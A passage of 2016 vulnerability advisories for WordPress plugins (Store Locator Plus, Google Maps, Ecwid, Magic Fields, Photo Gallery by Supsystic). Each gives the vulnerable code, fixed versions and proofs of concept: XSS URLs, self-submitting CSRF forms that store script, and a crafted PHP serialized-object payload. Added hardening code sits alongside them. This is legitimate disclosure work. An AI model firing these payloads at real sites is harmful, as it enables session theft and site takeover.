------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_link_library_wordpress_plugin.html
[2] https://wordpress.org/plugins/link-library/
[3] https://nl.wordpress.org/plugins/link-library/changelog/
------------------------------------------------------------------------
Cross-Site Scripting in Store Locator Plus for WordPress
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in Store Locator Plus for
WordPress. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0025

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Store Locator Plus for WordPress
[2] version 4.5.09.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Store Locator Plus for WordPress
version 4.5.12 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Store Locator Plus for WordPress [2] is a location mapping and directory
system with over 10,000 active installations. A Cross-Site Scripting
vulnerability was found in Store Locator Plus for WordPress. This issue
allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists in the file include/class.admin.locations.add.php and
is caused due to the lack of output encoding on the start request
parameter.

$this->section_params['opening_html'] =
	"<form id='manualAddForm' name='manualAddForm' method='post'>" .
	( $this->adding
		? '<input type="hidden" id="act" name="act" value="add" />'
		: '<input type="hidden" id="act" name="act" value="edit" />' ) .
	"<input type='hidden' name='id' " .
	"id='id' value='{$this->slplus->currentLocation->id}' />" .
	"<input type='hidden' name='locationID' " .
	"id='locationID' value='{$this->slplus->currentLocation->id}' />" .
	"<input type='hidden' name='linked_postid-{$this->slplus->currentLocation->id}' " .
	"id='linked_postid-{$this->slplus->currentLocation->id}' value='" .
	$this->slplus->currentLocation->linked_postid .
	"' />" .
	( isset( $_REQUEST['start'] )
		? "<input type='hidden' name='start' id='start' value='{$_REQUEST['start']}' />"
		: '' ) .
	"<a name='a{$this->slplus->currentLocation->id}'></a>";
	
In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=slp_manage_locations&start=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_store_locator_plus_for_wordpress.html
[2] https://wordpress.org/plugins/store-locator-le/
[3] https://downloads.wordpress.org/plugin/store-locator-le.4.5.12.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Google Maps WordPress Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Google Maps
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0038

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Google Maps [2] WordPress Plugin
version 2.1.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Google Maps version 2.1.4 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Google Maps [2] WordPress Plugin is a simple and effective tool for
rapid creation of individual Google Maps in posts and pages. A
Cross-Site Scripting vulnerability was found in the Google Maps
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists due to the lack of output encoding on the id URL
parameter. The vulnerable code fragment is listed below:

<form
action="admin.php?page=hugeitgooglemaps_main&task=edit_cat&id=<?php echo
$_GET['id']; ?>" method="post" name="adminform" id="adminform">
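
The three reflected XSS issues above (Link Library, Store Locator Plus and
the Google Maps plugin) share one root cause: request data is concatenated
into HTML without validation or context-appropriate encoding. The block
below is an added example written for this page, not code from any of the
three plugins. It is plain PHP so it runs from the CLI; inside WordPress
the same job is done by absint() for numeric values, esc_html() for text
nodes and esc_attr() for quoted attribute values. Treating the Google Maps
"id" parameter as a numeric category id is an assumption made here.

```php
<?php
// Added example: the three reflected-XSS sinks above, hardened. Not code
// from Link Library, Store Locator Plus or the Google Maps plugin.
// In WordPress: absint() for counters/ids, esc_html() for text nodes,
// esc_attr() for quoted attribute values.

// Encode <, >, &, " and ' so a value cannot break out of a text node or
// out of a quoted attribute (single- or double-quoted).
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Link Library: the counters are integers, so validate them as integers
// instead of echoing the raw query string.
function import_message(array $get): string {
    $imported = max(0, (int) ($get['successimportcount'] ?? 0));
    $updated  = max(0, (int) ($get['successupdatecount'] ?? 0));
    return "<div id='message' class='updated fade'><p><strong>"
        . "$imported link(s) imported, $updated link(s) updated."
        . "</strong></p></div>";
}

// Store Locator Plus: 'start' lands in a single-quoted attribute value.
function start_field(array $request): string {
    if (!isset($request['start'])) {
        return '';
    }
    return "<input type='hidden' name='start' id='start' value='"
        . h((string) $request['start']) . "' />";
}

// Google Maps: 'id' lands inside a double-quoted action URL. Assumed here
// to be a numeric category id, so cast it, then encode the whole attribute
// (which also turns the '&' separators into '&amp;', as HTML requires).
function edit_cat_form(array $get): string {
    $id = max(0, (int) ($get['id'] ?? 0));
    $action = 'admin.php?page=hugeitgooglemaps_main&task=edit_cat&id=' . $id;
    return '<form action="' . h($action)
        . '" method="post" name="adminform" id="adminform">';
}

// Replay the advisories' payloads against the hardened functions.
$outputs = [
    import_message(['successimportcount' => '1" /><script>alert(1)</script>']),
    start_field(['start' => "'><script>alert(1)</script>"]),
    edit_cat_form(['id' => '1"><h3>BREAK</h3>']),
];
foreach ($outputs as $html) {
    if (preg_match('/<(script|h3)/i', $html)) {
        fwrite(STDERR, "unencoded tag survived: $html\n");
        exit(1);
    }
    echo $html, "\n";
}
```

The encoding function is the same for text and quoted-attribute contexts;
what matters is that the attribute in the template is actually quoted, and
that values which are numbers by design are rejected as anything else
rather than encoded.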

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=hugeitgooglemaps_main&task=edit_cat&id=1%22%3E%3Ch3%3EBREAK%3C%2Fh3%3E
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_google_maps_wordpress_plugin.html
[2] https://wordpress.org/plugins/google-maps/
[3] https://downloads.wordpress.org/plugin/google-maps.2.1.4.zip
------------------------------------------------------------------------
Ecwid Ecommerce Shopping Cart WordPress Plugin unauthenticated PHP
Object injection vulnerability
------------------------------------------------------------------------
Yorick Koster, June 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in the Ecwid Ecommerce
Shopping Cart WordPress Plugin, which can be used by an unauthenticated
user to instantiate arbitrary PHP Objects. Using this vulnerability it
is possible to execute arbitrary PHP code.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160803-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Ecwid Ecommerce Shopping Cart
[2] WordPress Plugin version 4.4/4.4.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Ecwid Ecommerce Shopping Cart version
4.4.4 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Ecwid Ecommerce Shopping Cart [2] WordPress Plugin is an easy-to-use
online store solution that gives you a full-functioned shop on your
WordPress website. A PHP Object injection [4] vulnerability was found in
the Ecwid Ecommerce Shopping Cart WordPress Plugin, which can be used by
an unauthenticated user to instantiate arbitrary PHP Objects.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue is possible due to an unsafe call to unserialize() in the
_load_state() method. The input is taken directly from the
ecwid_oauth_state cookie as can be seen in the following code fragment:

includes/class-ecwid-oauth.php:

protected function _load_state() {
	if ( isset( $_COOKIE['ecwid_oauth_state'] ) ) {
		$this->state = @unserialize( $_COOKIE['ecwid_oauth_state'] );
	}
}

Because the cookie is fully attacker-controlled and no authentication is
required to reach this code path, any class loadable in the WordPress
process can be instantiated with attacker-chosen properties. It has been
confirmed that this issue can be used to execute arbitrary PHP code.
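
The following block is an added example, not Ecwid's code, showing why
unserialize() on a cookie is exploitable and two ways to close it: the
allowed_classes option of PHP 7 and, preferably, not unserializing client
data at all but storing the OAuth state as HMAC-bound JSON. The LogWriter
class is a constructed stand-in for whatever classes are loadable in the
target process; it is not a gadget taken from the plugin or from
WordPress, and the serialized cookie is hand-written test input.

```php
<?php
// Added example, not Ecwid's code. LogWriter is a constructed stand-in
// class, not a gadget from the plugin or from WordPress.

class LogWriter {
    public $path = '/tmp/app.log';
    public $data = 'hello';
    // Magic methods run during unserialize() or on destruction with
    // attacker-chosen properties: that is what object injection buys.
    public function __wakeup()  { echo "__wakeup(): path={$this->path}\n"; }
    public function __destruct() { echo "__destruct(): would write '{$this->data}' to {$this->path}\n"; }
}

// As in the advisory: the cookie value goes straight into unserialize().
function load_state_unsafe(string $cookie) {
    return @unserialize($cookie);
}

// Mitigation 1 (PHP >= 7.0): forbid every class. Objects in the payload
// become __PHP_Incomplete_Class and no magic method is invoked.
function load_state_no_classes(string $cookie) {
    return @unserialize($cookie, ['allowed_classes' => false]);
}

// Mitigation 2 (preferred): never unserialize client data. Keep the OAuth
// state as JSON and bind it with an HMAC so the client cannot alter it.
function state_encode(array $state, string $key): string {
    $json = json_encode($state);
    return $json . '|' . hash_hmac('sha256', $json, $key);
}

function state_decode(string $cookie, string $key): ?array {
    $parts = explode('|', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$json, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $json, $key), $mac)) {
        return null;                        // tampered, or not issued by us
    }
    $state = json_decode($json, true);      // arrays only, never objects
    return is_array($state) ? $state : null;
}

// Constructed attacker cookie: a serialized LogWriter with attacker-chosen
// properties (hand-written so that no LogWriter is created by this script).
$evil = 'O:9:"LogWriter":2:{s:4:"path";s:13:"/tmp/evil.log";s:4:"data";s:9:"injected!";}';

$obj = load_state_unsafe($evil);            // __wakeup() fires immediately
echo get_class($obj), "\n";                 // LogWriter
unset($obj);                                // __destruct() fires

$safe = load_state_no_classes($evil);       // no magic method runs
echo get_class($safe), "\n";                // __PHP_Incomplete_Class

$key = random_bytes(32);                    // a real key would live in wp-config.php
$cookie = state_encode(['nonce' => 'abc123', 'return_url' => '/wp-admin/'], $key);
var_dump(state_decode($cookie, $key) !== null);   // bool(true)
var_dump(state_decode($cookie . 'x', $key));      // NULL: MAC mismatch
var_dump(state_decode($evil, $key));              // NULL: no MAC part at all
```

allowed_classes stops the magic-method trigger but still lets an attacker
shape the data the application reads back; the signed-JSON variant also
gives integrity, which an OAuth state value needs anyway.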
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/ecwid_ecommerce_shopping_cart_wordpress_plugin_unauthenticated_php_object_injection_vulnerability.html
[2] https://wordpress.org/plugins/ecwid-shopping-cart/
[3] https://downloads.wordpress.org/plugin/ecwid-shopping-cart.4.4.4.zip
[4] https://www.owasp.org/index.php/PHP_Object_Injection
------------------------------------------------------------------------
Persistent Cross-Site Scripting in Magic Fields 1 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Magic Fields 1
plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0020

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 1 [2] version 1.7.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 1.7.2 [3]

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Magic Fields 1 plugin does not protect the request that adds a custom
field with a CSRF (nonce) token, and the description of a custom field is
rendered without output encoding. Together these allow an attacker to
store script code through a forged request; the script is then executed
in the browser of any administrator who views the custom field.

The attacker has to lure a logged-in administrator into following a link
to a page containing the proof of concept below.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The proof of concept below injects script code in the "description"
field when adding a new custom field.

<html>
	<body>
		<form action="http://build.wordpress-develop.dev/wp-admin/admin.php?page=MagicFieldsMenu&custom-write-panel-id=1&mf_action=finish-create-custom-field" method="POST">
			<input type="hidden" name="custom&#45;group&#45;id" value="1" />
			<input type="hidden" name="custom&#45;field&#45;name" value="asd222asd" />
			<input type="hidden" name="custom&#45;field&#45;description" value="as22da2&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
			<input type="hidden" name="custom&#45;field&#45;duplicate" value="" />
			<input type="hidden" name="custom&#45;field&#45;order" value="0" />
			<input type="hidden" name="custom&#45;field&#45;required" value="0" />
			<input type="hidden" name="custom&#45;field&#45;type" value="1" />
			<input type="hidden" name="custom&#45;field&#45;helptext" value="" />
			<input type="hidden" name="custom&#45;field&#45;css" value="magicfields" />
			<input type="hidden" name="custom&#45;field&#45;size" value="25" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_magic_fields_1_wordpress_plugin.html
[2] http://magicfields.org/
[3] https://github.com/hunk/Magic-Fields#172
------------------------------------------------------------------------
Persistent Cross-Site Scripting in Magic Fields 2 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Magic Fields 2
plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0017

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 2 [2] version
2.3.2.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 2.3.3 [3]

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Magic Fields 2 plugin does not protect the request that saves a custom
field with a CSRF (nonce) token, and the field's label is rendered without
output encoding. Together these allow an attacker to store script code
through a forged request; the script is then executed in the browser of
any administrator who views the custom field.

The attacker has to lure a logged-in administrator into following a link
to a page containing the proof of concept below.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The proof of concept below injects script code in the "Login Required
Message" in the settings page.

<html>
	<body>
		<form action="http://build.wordpress-develop.dev/wp-admin/admin.php?page=mf_dispatcher&init=true&mf_section=mf_custom_fields&mf_action=save_custom_field" method="POST">
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;id&#93;" value="" />
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;post&#95;type&#93;" value="page" />
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;custom&#95;group&#95;id&#93;" value="" />
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;label&#93;" value="foo&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;name&#93;" value="foo" />
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;description&#93;" value="asdasdasd" />
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;type&#93;" value="audio" />
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;required&#95;field&#93;" value="0" />
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;duplicate&#93;" value="0" />
			<input type="hidden" name="submit" value="Save&#32;Custom&#32;Field" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_magic_fields_2_wordpress_plugin.html
[2] http://magicfields.org/
[3] https://github.com/magic-fields-team/Magic-Fields-2#233
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Photo Gallery WordPress
Plugin
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Photo Gallery by
Supsystic WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Scripting
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing users' session tokens, or performing arbitrary
actions on their behalf. In order to exploit this issue, the attacker
has to lure/force a victim into opening a malicious website/link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The caption text of a gallery image is vulnerable to stored Cross-Site
Scripting. On its own this is only exploitable by a user who already has
administrative privileges. However, the admin-ajax.php request that saves
the image details has no protection against Cross-Site Request Forgery,
so an attacker can deliver the stored Cross-Site Scripting payload through
a forged request from a site the victim visits.
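
The Magic Fields 1, Magic Fields 2 and Photo Gallery issues all turn a
write that only an administrator can perform into something an attacker
can trigger, because the save request carries no token bound to the
victim's session. The block below is an added example written for this
page, not code from any of the three plugins: a minimal CSRF token modelled
on WordPress nonces (HMAC over a time tick, the action and the user id,
valid for the current and previous tick), plus a save handler that rejects
the forged form from the proofs of concept and encodes what it stores on
output. In a real plugin the equivalents are wp_nonce_field() in the form
with check_admin_referer() in an admin-page handler, check_ajax_referer()
in an admin-ajax.php handler such as the Photo Gallery one, and
current_user_can() for the capability check. The secret, user id and form
data here are constructed.

```php
<?php
// Added example, not code from Magic Fields or Photo Gallery by Supsystic.
// Plain-PHP stand-in for wp_create_nonce()/wp_verify_nonce(); the secret
// corresponds to NONCE_KEY/NONCE_SALT in wp-config.php.

const NONCE_LIFE = 12 * 3600;   // WordPress nonces span two 12-hour ticks
const ACTION     = 'save_custom_field';

function nonce_tick(): int {
    return (int) ceil(time() / NONCE_LIFE);
}

function nonce_for_tick(int $tick, string $action, int $user_id, string $secret): string {
    return substr(hash_hmac('sha256', "$tick|$action|$user_id", $secret), -12, 10);
}

function create_nonce(string $action, int $user_id, string $secret): string {
    return nonce_for_tick(nonce_tick(), $action, $user_id, $secret);
}

// Accept the current tick and the previous one, like wp_verify_nonce().
function verify_nonce(string $nonce, string $action, int $user_id, string $secret): bool {
    foreach ([0, 1] as $back) {
        $expected = nonce_for_tick(nonce_tick() - $back, $action, $user_id, $secret);
        if (hash_equals($expected, $nonce)) {
            return true;
        }
    }
    return false;
}

// Save handler: capability check, nonce check, then sanitise on input and
// encode on output. All three are needed; the advisories lack the last two.
function save_custom_field(array $post, int $user_id, bool $can_manage, string $secret): array {
    if (!$can_manage) {
        return ['ok' => false, 'why' => 'insufficient capability'];
    }
    if (!verify_nonce((string) ($post['_wpnonce'] ?? ''), ACTION, $user_id, $secret)) {
        return ['ok' => false, 'why' => 'nonce check failed'];
    }
    $label = trim(strip_tags((string) ($post['label'] ?? '')));   // input sanitising
    $html  = '<td>' . htmlspecialchars($label, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
    return ['ok' => true, 'label' => $label, 'html' => $html];
}

$secret = 'constructed-site-secret';
$admin  = 1;

// The forged cross-site form sends the admin's cookies but cannot carry a
// nonce bound to the admin's account, so the write is refused.
$forged = ['label' => 'foo"><script>alert(1)</script>'];
$r = save_custom_field($forged, $admin, true, $secret);
var_dump($r['why']);                        // "nonce check failed"

// A submission from the plugin's own page carries the nonce and succeeds,
// and the stored label is encoded when rendered.
$legit = $forged + ['_wpnonce' => create_nonce(ACTION, $admin, $secret)];
$r = save_custom_field($legit, $admin, true, $secret);
var_dump($r['ok'], $r['html']);             // true, "<td>foo&quot;&gt;alert(1)</td>"

// A nonce minted for another user is rejected as well.
$other = $forged + ['_wpnonce' => create_nonce(ACTION, 2, $secret)];
var_dump(save_custom_field($other, $admin, true, $secret)['ok']);   // false
```

A nonce alone does not fix the stored XSS: an administrator who is
legitimately on the page can still save a script tag, which is why the
handler also encodes the value when it is rendered.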

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form method="post" action="http://<target>/wp-admin/admin-ajax.php">
			<input type="hidden" name="caption" value='this is the
caption"><script>alert("Fromfff CSRF to XSS!");</script>'>
			<input type="hidden" name="captionEffect" value="quarter-slide-up">
			<input type="hidden" name="description" value="">
			<input type="hidden" name="alt" value="Capture">
			<input type="hidden" name="link" value="">
			<input type="hidden" name="cropPosition" value="center-center">
			<input type="hidden" name="replace_attachment_id" value="">
			<input type="hidden" name="image_id" value="13">
			<input type="hidden" name="attachment_id" value="10">
			<input type="hidden" name="gallery_id" value="6">
			<input type="hidden" name="action" value="grid-gallery">
			<input type="hidden" name="route[module]" value="photos">
			<input type="hidden" name="route[action]" value="updateAttachment">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_photo_gallery_wordpress_plugin.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip
